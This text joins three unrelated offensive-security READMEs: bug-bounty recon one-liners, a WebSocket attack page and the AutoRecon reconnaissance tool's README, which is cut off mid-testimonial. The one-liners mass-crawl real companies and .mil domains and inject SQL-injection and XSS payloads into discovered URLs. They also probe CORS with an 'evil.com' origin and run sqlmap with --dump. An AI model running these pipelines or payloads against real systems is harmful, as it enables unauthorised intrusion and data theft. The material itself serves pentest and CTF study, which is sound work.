-f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search] Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command] ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command] ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command] ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command] ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command] ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command] ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command] ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command] ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command] ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command] ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command] ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command] Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command] echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command] ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command] To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command] ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command] ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command] ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command] ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command] ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command] ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command] ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command] ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command] ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command] ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command] ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command] ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' ``` ### Search to js using hakrawler and rush & unew - [Explained command] ```bash cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command] ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command] ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command] ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command] ```bash cat subdomsains.txt | httpx --silent | jsubfinder search -s ``` ### Search domains to Range-IPS. - [Explained command] ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command] ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command] ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command] ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command] ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command] ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
# Web Sockets Attacks > The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server Tools: - [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py) ## Summary * [Using ws-harness.py](#using-ws-harness-py) ## Using ws-harness.py Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint. ```powershell python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt ``` The content of the message should contains the **[FUZZ]** keyword. ```json {"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"} ``` Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket. ```python sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump ``` ## References - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/) - [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
> It's like bowling with bumpers. - [@ippsec](https://twitter.com/ippsec) # AutoRecon AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements. The tool works by firstly performing port scans / service detection scans. From those initial results, the tool will launch further enumeration scans of those services using a number of different tools. For example, if HTTP is found, feroxbuster will be launched (as well as many others). Everything in the tool is highly configurable. The default configuration performs **no automated exploitation** to keep the tool in line with OSCP exam rules. If you wish to add automatic exploit tools to the configuration, you do so at your own risk. The author will not be held responsible for negative actions that result from the mis-use of this tool. **Disclaimer: While AutoRecon endeavors to perform as much identification and enumeration of services as possible, there is no guarantee that every service will be identified, or that every service will be fully enumerated. Users of AutoRecon (especially students) should perform their own manual enumeration alongside AutoRecon. Do not rely on this tool alone for exams, CTFs, or other engagements.** ## Origin AutoRecon was inspired by three tools which the author used during the OSCP labs: [Reconnoitre](https://github.com/codingo/Reconnoitre), [ReconScan](https://github.com/RoliSoft/ReconScan), and [bscan](https://github.com/welchbj/bscan). While all three tools were useful, none of the three alone had the functionality desired. AutoRecon combines the best features of the aforementioned tools while also implementing many new features to help testers with enumeration of multiple targets. ## Features * Supports multiple targets in the form of IP addresses, IP ranges (CIDR notation), and resolvable hostnames. IPv6 is also supported. * Can scan multiple targets concurrently, utilizing multiple processors if they are available. * Advanced plugin system allowing for easy creation of new scans. * Customizable port scanning plugins for flexibility in your initial scans. * Customizable service scanning plugins for further enumeration. * Suggested manual follow-up commands for when automation makes little sense. * Ability to limit port scanning to a combination of TCP/UDP ports. * Ability to skip port scanning phase by suppling information about services which should be open. * Global and per-scan pattern matching which highlights and extracts important information from the noise. * An intuitive directory structure for results gathering. * Full logging of commands that were run, along with errors if they fail. * A powerful config file lets you use your favorite settings every time. * A tagging system that lets you include or exclude certain plugins. * Global and per-target timeouts in case you only have limited time. * Four levels of verbosity, controllable by command-line options, and during scans using Up/Down arrows. * Colorized output for distinguishing separate pieces of information. Can be turned off for accessibility reasons. ## Installation There are three ways to install AutoRecon: pipx, pip, and manually. Before installation using any of these methods, certain requirements need to be fulfilled. If you have not refreshed your apt cache recently, run the following command so you are installing the latest available packages: ```bash sudo apt update ``` ### Python 3 AutoRecon requires the usage of Python 3.8+ and pip, which can be installed on Kali Linux using the following commands: ```bash sudo apt install python3 sudo apt install python3-pip ``` ### Supporting Packages Several commands used in AutoRecon reference the SecLists project, in the directory /usr/share/seclists/. You can either manually download the SecLists project to this directory (https://github.com/danielmiessler/SecLists), or if you are using Kali Linux (**highly recommended**) you can run the following commands: ```bash sudo apt install seclists ``` AutoRecon will still run if you do not install SecLists, though several commands may fail, and some manual commands may not run either. Additionally the following commands may need to be installed, depending on your OS: ``` curl dnsrecon enum4linux feroxbuster gobuster impacket-scripts nbtscan nikto nmap onesixtyone oscanner redis-tools smbclient smbmap snmpwalk sslscan svwar tnscmd10g whatweb wkhtmltopdf ``` On Kali Linux, you can ensure these are all installed using the following commands: ```bash sudo apt install seclists curl dnsrecon enum4linux feroxbuster gobuster impacket-scripts nbtscan nikto nmap onesixtyone oscanner redis-tools smbclient smbmap snmp sslscan sipvicious tnscmd10g whatweb wkhtmltopdf ``` ### Installation Method #1: pipx (Recommended) It is recommended you use `pipx` to install AutoRecon. pipx will install AutoRecon in it's own virtual environment, and make it available in the global context, avoiding conflicting package dependencies and the resulting instability. First, install pipx using the following commands: ```bash sudo apt install python3-venv python3 -m pip install --user pipx python3 -m pipx ensurepath ``` You will have to re-source your ~/.bashrc or ~/.zshrc file (or open a new tab) after running these commands in order to use pipx. Install AutoRecon using the following command: ```bash pipx install git+https://github.com/Tib3rius/AutoRecon.git ``` Note that if you want to run AutoRecon using sudo (required for faster SYN scanning and UDP scanning), you have to use _one_ of the following examples: ```bash sudo env "PATH=$PATH" autorecon [OPTIONS] sudo $(which autorecon) [OPTIONS] ``` ### Installation Method #2: pip Alternatively you can use `pip` to install AutoRecon using the following command: ```bash python3 -m pip install git+https://github.com/Tib3rius/AutoRecon.git ``` Note that if you want to run AutoRecon using sudo (required for faster SYN scanning and UDP scanning), you will have to run the above command as the root user (or using sudo). Similarly to `pipx`, if installed using `pip` you can run AutoRecon by simply executing `autorecon`. ### Installation Method #3: Manually If you'd prefer not to use `pip` or `pipx`, you can always still install and execute `autorecon.py` manually as a script. From within the AutoRecon directory, install the dependencies: ```bash python3 -m pip install -r requirements.txt ``` You will then be able to run the `autorecon.py` script: ```bash python3 autorecon.py [OPTIONS] 127.0.0.1 ``` ## Upgrading ### pipx Upgrading AutoRecon when it has been installed with pipx is the easiest, and is why the method is recommended. Simply run the following command: ```bash pipx upgrade autorecon ``` ### pip If you've installed AutoRecon using pip, you will first have to uninstall AutoRecon and then re-install using the same install command: ```bash python3 -m pip uninstall autorecon python3 -m pip install git+https://github.com/Tib3rius/AutoRecon.git ``` ### Manually If you've installed AutoRecon manually, simply change to the AutoRecon directory and run the following command: ```bash git pull ``` Assuming you did not modify any of the content in the AutoRecon directory, this should pull the latest code from this GitHub repo, after which you can run AutoRecon using the autorecon.py script as per usual. ### Plugins A plugin update process is in the works. Until then, after upgrading, remove the ~/.local/share/AutoRecon directory and run AutoRecon with any argument to repopulate with the latest files. ## Usage AutoRecon uses Python 3 specific functionality and does not support Python 2. ``` usage: autorecon [-t TARGET_FILE] [-p PORTS] [-m MAX_SCANS] [-mp MAX_PORT_SCANS] [-c CONFIG_FILE] [-g GLOBAL_FILE] [--tags TAGS] [--exclude-tags TAGS] [--port-scans PLUGINS] [--service-scans PLUGINS] [--reports PLUGINS] [--plugins-dir PLUGINS_DIR] [--add-plugins-dir PLUGINS_DIR] [-l [TYPE]] [-o OUTPUT] [--single-target] [--only-scans-dir] [--no-port-dirs] [--heartbeat HEARTBEAT] [--timeout TIMEOUT] [--target-timeout TARGET_TIMEOUT] [--nmap NMAP | --nmap-append NMAP_APPEND] [--proxychains] [--disable-sanity-checks] [--disable-keyboard-control] [--force-services SERVICE [SERVICE ...]] [--accessible] [-v] [--version] [--curl.path VALUE] [--dirbuster.tool {feroxbuster,gobuster,dirsearch,ffuf,dirb}] [--dirbuster.wordlist VALUE [VALUE ...]] [--dirbuster.threads VALUE] [--dirbuster.ext VALUE] [--onesixtyone.community-strings VALUE] [--global.username-wordlist VALUE] [--global.password-wordlist VALUE] [--global.domain VALUE] [-h] [targets ...] Network reconnaissance tool to port scan and automatically enumerate services found on multiple targets. positional arguments: targets IP addresses (e.g. 10.0.0.1), CIDR notation (e.g. 10.0.0.1/24), or resolvable hostnames (e.g. foo.bar) to scan. optional arguments: -t TARGET_FILE, --target-file TARGET_FILE Read targets from file. -p PORTS, --ports PORTS Comma separated list of ports / port ranges to scan. Specify TCP/UDP ports by prepending list with T:/U: To scan both TCP/UDP, put port(s) at start or specify B: e.g. 53,T:21-25,80,U:123,B:123. Default: None -m MAX_SCANS, --max-scans MAX_SCANS The maximum number of concurrent scans to run. Default: 50 -mp MAX_PORT_SCANS, --max-port-scans MAX_PORT_SCANS The maximum number of concurrent port scans to run. Default: 10 (approx 20% of max-scans unless specified) -c CONFIG_FILE, --config CONFIG_FILE Location of AutoRecon's config file. Default: ~/.config/AutoRecon/config.toml -g GLOBAL_FILE, --global-file GLOBAL_FILE Location of AutoRecon's global file. Default: ~/.config/AutoRecon/global.toml --tags TAGS Tags to determine which plugins should be included. Separate tags by a plus symbol (+) to group tags together. Separate groups with a comma (,) to create multiple groups. For a plugin to be included, it must have all the tags specified in at least one group. Default: default --exclude-tags TAGS Tags to determine which plugins should be excluded. Separate tags by a plus symbol (+) to group tags together. Separate groups with a comma (,) to create multiple groups. For a plugin to be excluded, it must have all the tags specified in at least one group. Default: None --port-scans PLUGINS Override --tags / --exclude-tags for the listed PortScan plugins (comma separated). Default: None --service-scans PLUGINS Override --tags / --exclude-tags for the listed ServiceScan plugins (comma separated). Default: None --reports PLUGINS Override --tags / --exclude-tags for the listed Report plugins (comma separated). Default: None --plugins-dir PLUGINS_DIR The location of the plugins directory. Default: ~/.local/share/AutoRecon/plugins --add-plugins-dir PLUGINS_DIR The location of an additional plugins directory to add to the main one. Default: None -l [TYPE], --list [TYPE] List all plugins or plugins of a specific type. e.g. --list, --list port, --list service -o OUTPUT, --output OUTPUT The output directory for results. Default: results --single-target Only scan a single target. A directory named after the target will not be created. Instead, the directory structure will be created within the output directory. Default: False --only-scans-dir Only create the "scans" directory for results. Other directories (e.g. exploit, loot, report) will not be created. Default: False --no-port-dirs Don't create directories for ports (e.g. scans/tcp80, scans/udp53). Instead store all results in the "scans" directory itself. Default: False --heartbeat HEARTBEAT Specifies the heartbeat interval (in seconds) for scan status messages. Default: 60 --timeout TIMEOUT Specifies the maximum amount of time in minutes that AutoRecon should run for. Default: None --target-timeout TARGET_TIMEOUT Specifies the maximum amount of time in minutes that a target should be scanned for before abandoning it and moving on. Default: None --nmap NMAP Override the {nmap_extra} variable in scans. Default: -vv --reason -Pn -T4 --nmap-append NMAP_APPEND Append to the default {nmap_extra} variable in scans. Default: --proxychains Use if you are running AutoRecon via proxychains. Default: False --disable-sanity-checks Disable sanity checks that would otherwise prevent the scans from running. Default: False --disable-keyboard-control Disables keyboard control ([s]tatus, Up, Down) if you are in SSH or Docker. --force-services SERVICE [SERVICE ...] A space separated list of services in the following style: tcp/80/http tcp/443/https/secure --accessible Attempts to make AutoRecon output more accessible to screenreaders. Default: False -v, --verbose Enable verbose output. Repeat for more verbosity. --version Prints the AutoRecon version and exits. -h, --help Show this help message and exit. plugin arguments: These are optional arguments for certain plugins. --curl.path VALUE The path on the web server to curl. Default: / --dirbuster.tool {feroxbuster,gobuster,dirsearch,ffuf,dirb} The tool to use for directory busting. Default: feroxbuster --dirbuster.wordlist VALUE [VALUE ...] The wordlist(s) to use when directory busting. Separate multiple wordlists with spaces. Default: ['~/.local/share/AutoRecon/wordlists/dirbuster.txt'] --dirbuster.threads VALUE The number of threads to use when directory busting. Default: 10 --dirbuster.ext VALUE The extensions you wish to fuzz (no dot, comma separated). Default: txt,html,php,asp,aspx,jsp --onesixtyone.community-strings VALUE The file containing a list of community strings to try. Default: /usr/share/seclists/Discovery/SNMP/common-snmp- community-strings-onesixtyone.txt global plugin arguments: These are optional arguments that can be used by all plugins. --global.username-wordlist VALUE A wordlist of usernames, useful for bruteforcing. Default: /usr/share/seclists/Usernames/top-usernames-shortlist.txt --global.password-wordlist VALUE A wordlist of passwords, useful for bruteforcing. Default: /usr/share/seclists/Passwords/darkweb2017-top100.txt --global.domain VALUE The domain to use (if known). Used for DNS and/or Active Directory. Default: None ``` ### Verbosity AutoRecon supports four levels of verbosity: * (none) Minimal output. AutoRecon will announce when scanning targets starts / ends. * (-v) Verbose output. AutoRecon will additionally announce when plugins start running, and report open ports and identified services. * (-vv) Very verbose output. AutoRecon will additionally specify the exact commands which are being run by plugins, highlight any patterns which are matched in command output, and announce when plugins end. * (-vvv) Very, very verbose output. AutoRecon will output everything. Literally every line from all commands which are currently running. When scanning multiple targets concurrently, this can lead to a ridiculous amount of output. It is not advised to use -vvv unless you absolutely need to see live output from commands. Note: You can change the verbosity of AutoRecon mid-scan by pressing the up and down arrow keys. ### Results By default, results will be stored in the ./results directory. A new sub directory is created for every target. The structure of this sub directory is: ``` . ├── exploit/ ├── loot/ ├── report/ │   ├── local.txt │   ├── notes.txt │   ├── proof.txt │   └── screenshots/ └── scans/ ├── _commands.log ├── _manual_commands.txt ├── tcp80/ ├── udp53/ └── xml/ ``` The exploit directory is intended to contain any exploit code you download / write for the target. The loot directory is intended to contain any loot (e.g. hashes, interesting files) you find on the target. The report directory contains some auto-generated files and directories that are useful for reporting: * local.txt can be used to store the local.txt flag found on targets. * notes.txt should contain a basic template where you can write notes for each service discovered. * proof.txt can be used to store the proof.txt flag found on targets. * The screenshots directory is intended to contain the screenshots you use to document the exploitation of the target. The scans directory is where all results from scans performed by AutoRecon will go. This includes port scans / service detection scans, as well as any service enumeration scans. It also contains two other files: * \_commands.log contains a list of every command AutoRecon ran against the target. This is useful if one of the commands fails and you want to run it again with modifications. * \_manual_commands.txt contains any commands that are deemed "too dangerous" to run automatically, either because they are too intrusive, require modification based on human analysis, or just work better when there is a human monitoring them. By default, directories are created for each open port (e.g. tcp80, udp53) and scan results for the services found on those ports are stored in their respective directories. You can disable this behavior using the --no-port-dirs command line option, and scan results will instead be stored in the scans directory itself. If a scan results in an error, a file called \_errors.log will also appear in the scans directory with some details to alert the user. If output matches a defined pattern, a file called \_patterns.log will also appear in the scans directory with details about the matched output. The scans/xml directory stores any XML output (e.g. from Nmap scans) separately from the main scan outputs, so that the scans directory itself does not get too cluttered. ## Testimonials > AutoRecon was invaluable during my OSCP exam, in that it saved me from the tedium of executing my active information gathering commands myself. I was able to start on a target with all of the information I needed clearly laid in front of me. I would strongly recommend this utility for anyone in the PWK labs, the OSCP exam, or other environments such as VulnHub or HTB. It is a great tool for both people just starting down their journey into OffSec and seasoned veterans alike. Just make sure that somewhere between those two points you take the time to learn what's going on "under the hood" and how / why it scans what it does. > >\- b0ats (rooted 5/5 exam hosts) > Wow, what a great find! Before using AutoRecon, ReconScan was my goto enumeration script for targets because it automatically ran the enumeration commands after it finds open ports. The only thing missing was the automatic creation of key directories a pentester might need during an engagement (exploit, loot, report, scans). Reconnoitre did this but didn't automatically run those commands for you. I thought ReconScan that was the bee's knees until I gave AutoRecon a try. It's awesome! It combines the best features of Reconnoitre (auto directory creation) and ReconScan (automatically executing the enumeration commands). All I have to do is run it on a target or a set of targets and start going over the information it has already collected while it continues the rest of scan. The proof is in the pudding :) Passed the OSCP exam! Kudos to Tib3rius! > >\- werk0ut > A friend told me about AutoRecon, so I gave it a try in the PWK labs. AutoRecon launches the common tools we all always use, whether it be nmap or nikto, and also creates a nice subfolder system based on the targets you are attacking. The strongest feature of AutoRecon is the speed; on the OSCP exam I left the tool running in the background while I started with another target, and in a matter of minutes I had all of the AutoRecon output waiting for me. AutoRecon creates a file full of commands that you should try manually, some of which may require tweaking (for example, hydra bruteforcing commands). It's good to have that extra checklist. > >\- tr3mb0 (rooted 4/5 exam hosts) > Being introduced to AutoRecon was a complete game changer for me while taking the OSCP and establishing my penetration testing methodology. AutoRecon is a multi-threaded reconnaissance tool that combines and automates popular enumeration tools to do most of the hard work for you. You can't get much better than that! After running AutoRecon on my OSCP exam hosts, I was given a treasure chest full of information that helped me to start on each host and pass on my first try. The best part of the tool is that it automatically launches further enumeration scans based on the initial port scans (e.g. run enum4linux if SMB is detected). The only bad part is that I did not use this tool sooner! Thanks Tib3rius. > >\- rufy (rooted 4/5 exam hosts) > AutoRecon allows a security researcher to iteratively scan hosts and identify potential attack vectors. Its true power comes in the form of performing scans in the background while the attacker is working on another host. I was able to start my scans and finish a specific host I was working on - and then return to find all relevant scans completed. I was then able to immediately begin trying to gain initial access instead of manually performing the active scanning process. I will continue to use AutoRecon in future penetration tests and CTFs, and highly recommend you do the same. > >\- waar (rooted 4.99/5 exam hosts) > "If you have to do a task more than twice a day, you need to automate it." That's a piece of advice that an old boss gave to me. AutoRecon takes that lesson to heart. Whether you're sitting in the exam, or in the PWK labs, you can fire off AutoRecon and let it work its magic. I had it running during my last exam while I worked on the buffer overflow. By the time I finished, all the enum data I needed was there for me to go through. 10/10 would recommend for anyone getting into CTF, and anyone who has been at this a long time. > >\- whoisflynn > I love this tool so much I wrote it. > >\- Tib3rius (rooted 5/5 exam hosts) > I highly recommend anyone going for their OSCP, doing CTFs or on HTB to checkout this tool. Been using AutoRecon on HTB for a month before using it over on the PWK labs and it helped me pass my 